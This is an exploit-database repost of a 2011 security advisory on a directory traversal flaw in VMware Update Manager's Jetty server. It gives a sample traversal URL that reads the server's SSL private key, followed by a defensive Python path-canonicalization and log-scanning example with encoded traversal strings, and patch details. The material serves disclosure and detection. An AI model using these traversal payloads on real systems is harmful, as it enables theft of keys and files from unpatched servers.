0day Today Exploits Market and 0day Exploits Database

VMware Update Manager Directory Traversal

Author: Alexey Sintsov
Risk: Security Risk Unsorted
0day-ID: 0day-ID-16861
Category: remote exploits
Date added: 20-11-2011
Platform: windows
# Exploit Title: VMware Update Manager Directory Traversal
# Date: 18/11/2011
# Author: Alexey Sintsov
# Software Link: http://www.vmware.com/
# Version: 2.0.2
# Tested on: Windows 2003 / vCenter Update Manager 4.1 U1
# CVE: CVE-2011-4404
 
DSECRG-11-042 VMware Update Manager - Directory Traversal
 
 
Application: VMware Update Manager
Versions Affected: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4.0 prior to Update 4
Vendor URL: http://vmware.com
Bugs: Directory Traversal File Read
CVE: CVE-2011-4404
CVSS2: 7.8
Exploits: YES
Reported: 06.06.2010
Vendor response: 06.06.2010
Date of Public Advisory: 18.11.2011
Authors: Alexey Sintsov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)
 
Description
********
A directory traversal vulnerability was found in the Jetty web server that is used by VMware Update Manager.
 
Details
*******
A directory traversal vulnerability was found in the Jetty web server that is used by VUM.
With this vulnerability, an unauthenticated attacker can read any file on the server (with the rights of the VUM process).
 
Sample
******
http://<target>:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key
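Added example (not part of the DSecRG advisory or VMware's code): a Python path-canonicalization check that rejects the traversal pattern shown above, including the backslash and percent-encoded variants, followed by a scan of constructed access-log lines for requests that escape the /vci/downloads/ handler. The log format, client addresses and file names are constructed for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Handler path from the advisory's sample URL; everything served must stay beneath it.
DOWNLOAD_PREFIX = "/vci/downloads/"

def normalize_request_path(raw_path: str) -> str:
    """Canonicalize a URL path as a Windows-hosted server would resolve it:
    percent-decode twice (catches %252e double encoding), treat '\\' as a
    separator (the advisory's sample uses '.\\..\\'), then collapse '.' and '..'
    against an anchored root so '..' can never climb above '/'."""
    decoded = unquote(unquote(raw_path)).replace("\\", "/")
    return posixpath.normpath("/" + decoded.lstrip("/"))

def is_confined(raw_path: str, prefix: str = DOWNLOAD_PREFIX) -> bool:
    """True only if the canonical path still lies beneath the download directory."""
    return normalize_request_path(raw_path).startswith(prefix)

# Constructed access-log lines, simplified to '<client> "GET <path> HTTP/1.1" <status>'.
SAMPLE_LOG = [
    '10.0.0.5 "GET /vci/downloads/vmware-tools.zip HTTP/1.1" 200',
    '10.0.0.9 "GET /vci/downloads/.%5c..%5c..%5c..%5cDocuments%20and%20Settings%5cAll%20Users%5crui.key HTTP/1.1" 200',
    '10.0.0.7 "GET /vci/downloads/%2e%2e/%2e%2e/boot.ini HTTP/1.1" 404',
    '10.0.0.5 "GET /vci/downloads/sub/../patch.vib HTTP/1.1" 200',
]
REQUEST_RE = re.compile(r'^(\S+) "GET (\S+) HTTP')

def flag_traversal_requests(log_lines):
    """Return (client, raw_path) for download-handler requests whose canonical
    path escapes the handler. Naive '..' matching would also flag the harmless
    'sub/../patch.vib' request; canonicalizing first keeps it and still catches
    the backslash and percent-encoded variants."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, path = m.group(1), m.group(2)
        if path.startswith(DOWNLOAD_PREFIX) and not is_confined(path):
            hits.append((client, path))
    return hits

if __name__ == "__main__":
    for client, path in flag_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {client}: {path}")
```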
 
 
References
**********
 
http://dsecrg.com/pages/vul/show.php?id=342
http://www.vmware.com/security/advisories/VMSA-2011-0014.html
 
 
Fix Information
*************
 
The vendor has fixed this issue:
Update Manager 5.0 (Windows): not affected
Update Manager 4.1 (Windows): fixed in Update 2
Update Manager 4.0 (Windows): fixed in Update 4



#  0day.today [2024-12-24]  #